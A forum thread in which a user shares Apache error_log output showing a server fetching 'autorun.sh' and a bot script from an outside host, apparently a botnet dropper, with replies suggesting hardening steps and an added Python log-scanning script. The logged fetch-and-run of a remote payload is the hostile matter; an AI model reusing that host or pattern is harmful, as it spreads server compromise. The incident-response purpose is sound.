I'm facing a problem with Apache. The following logs are showing in the error_log file.
--15:01:26-- http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: `autorun.sh'
0K 100% 51.6M=0s
15:01:26 (51.6 MB/s) - `autorun.sh' saved [396/396]
sh: fetch: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 396 100 396 0 0 70387 0 --:--:-- --:--:-- --:--:-- 0
connected.
HTTP request sent, awaiting response... 200 OK
Length: 28762 (28K) [text/plain]
Saving to: `b0t3.txt'
0K .......... .......... ........ 100% 8.75M=0.003s
15:01:27 (8.75 MB/s) - `b0t3.txt' saved [28762/28762]
sh: fetch: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 28762 100 28762 0 0 3434k 0 --:--:-- --:--:-- --:--:-- 13.1M
sh: /usr/bin/lwp-download: /usr/bin/perl: bad interpreter: Permission denied
sh: /usr/bin/perl: Permission denied
--15:01:27-- http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: `autorun.sh'
0K 100% 31.8M=0s
15:01:27 (31.8 MB/s) - `autorun.sh' saved [396/396]
sh: fetch: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 396 100 396 0 0 48768 0 --:--:-- --:--:-- --:--:-- 0
How can I prevent this issue?
Seems someone tried to download and run a Perl script using one of your webpages that might be vulnerable. - Try to disable execution of all interpreters (perl, python, curl, c, etc.).
I assume it could be Apache + PHP; if yes, you may disable: allow_url_fopen = Off, to disable downloads via PHP.
add httpd mod_security
You have a script somewhere reaching out to grab what looks like a botnet script, trying to save it & execute it locally, which is not happening as it is in the error file.
find out what that script is using to retrieve the file [block it if you can]
download & scan with rkhunter
-sean
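For triage of a log like the one in the question, the following added example (not part of the thread) scans error_log text for wget transcripts, curl progress meters and `sh:` errors, which land there when a process started by the web server inherits its stderr. The function name, report layout and sample host are assumptions made for illustration.

```python
import re

# Downloader and shell output that ends up in the Apache error_log when a
# process started by the web server inherits its stderr.
WGET_START = re.compile(r"^--(\d{2}:\d{2}:\d{2})--\s+(\S+)")
WGET_SAVED = re.compile(r"^(\d{2}:\d{2}:\d{2}) \(.*?\) - [`'](.+?)' saved \[(\d+)/\d+\]")
SHELL_ERR = re.compile(r"^sh: (\S+?): (.+)$")
CURL_METER = re.compile(r"^% Total\s+% Received")

def scan_error_log(text):
    """Collect fetch attempts, curl runs and shell errors from error_log text."""
    report = {"fetches": [], "curl_runs": 0, "shell_errors": []}
    pending = None  # wget transcript whose "saved" line has not been seen yet
    for raw in text.splitlines():
        line = raw.strip()
        if m := WGET_START.match(line):
            pending = {"time": m.group(1), "url": m.group(2), "saved_as": None, "size": None}
            report["fetches"].append(pending)
        elif m := WGET_SAVED.match(line):
            if pending is None:
                # Start of the transcript is missing (truncated log): keep the
                # file name anyway, with an unknown URL.
                pending = {"time": m.group(1), "url": None, "saved_as": None, "size": None}
                report["fetches"].append(pending)
            pending["saved_as"], pending["size"] = m.group(2), int(m.group(3))
            pending = None
        elif CURL_METER.match(line):
            report["curl_runs"] += 1
        elif m := SHELL_ERR.match(line):
            report["shell_errors"].append((m.group(1), m.group(2)))
    return report

# Constructed sample in the shape of the log in the question (host is a placeholder).
SAMPLE = """\
--15:01:26-- http://files.example.invalid/autorun.sh
Saving to: `autorun.sh'
15:01:26 (51.6 MB/s) - `autorun.sh' saved [396/396]
sh: fetch: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
connected.
Saving to: `b0t3.txt'
15:01:27 (8.75 MB/s) - `b0t3.txt' saved [28762/28762]
sh: /usr/bin/lwp-download: /usr/bin/perl: bad interpreter: Permission denied
"""

if __name__ == "__main__":
    for fetch in scan_error_log(SAMPLE)["fetches"]:
        print(fetch)
```

Each reported file name is something to look for in directories the web server user can write to, and the timestamps can be matched against the access_log to find the request that triggered the download.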